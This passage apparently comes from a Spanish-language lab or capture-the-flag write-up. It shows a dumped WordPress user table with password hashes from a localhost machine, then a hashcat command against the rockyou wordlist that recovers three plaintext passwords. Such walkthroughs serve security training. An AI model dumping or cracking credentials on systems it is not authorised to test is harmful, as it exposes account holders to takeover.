        | ID | user_login | user_pass                          | user_nicename | user_email           | user_url                   | user_registered     | user_activation_key                           | user_status | display_name    |
        +----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
        |  1 | admin      | $P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L. | admin         | [email protected]  | http://localhost/wordpress | 2023-06-15 14:30:02 |                                               |           0 | admin           |
        |  2 | hugo       | $P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90 | hugo          | [email protected]    |                            | 2023-06-15 14:32:39 | 1686839559:$P$Bp1eBXl/RR6RcMkYSytgzc1sHt6nml1 |           0 | hugo torres     |
        |  3 | philip     | $P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/ | philip        | [email protected]  |                            | 2023-06-15 14:33:13 | 1686839593:$P$BYVMku..4QUJUIzoUHMr8tdsv87TNK/ |           0 | philip padilla  |
        |  4 | vagrant    | $P$BkxK5UElDjCJU1dd19x9PExnko8//h/ | vagrant       | [email protected] |                            | 2023-06-15 14:34:18 | 1686839658:$P$B4eTfAbXY8.IA4sRYmBjlf0DKf0ohH/ |           0 | vagrant vagrant |
        +----+------------+------------------------------------+---------------+----------------------+----------------------------+---------------------+-----------------------------------------------+-------------+-----------------+
        4 rows in set (0,001 sec)
        
        MariaDB [wordpress]> 

Y vemos contraseñas hasheadas, así que vamos a intentar romperlas con Hashcat:

hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
        * Filename..: /usr/share/wordlists/rockyou.txt
        * Passwords.: 14344385
        * Bytes.....: 139921507
        * Keyspace..: 14344385
        
        $P$B8PrCLuqtOllR1UF0ytq6XAdhQXP.L.:password               
        $P$BkWfN11QN9Q8U8BMAf/x.zJrDQZwZt/:password               
        $P$BpkDfTwUL.u/nPtFwtI0XjFES/GvY90:987654321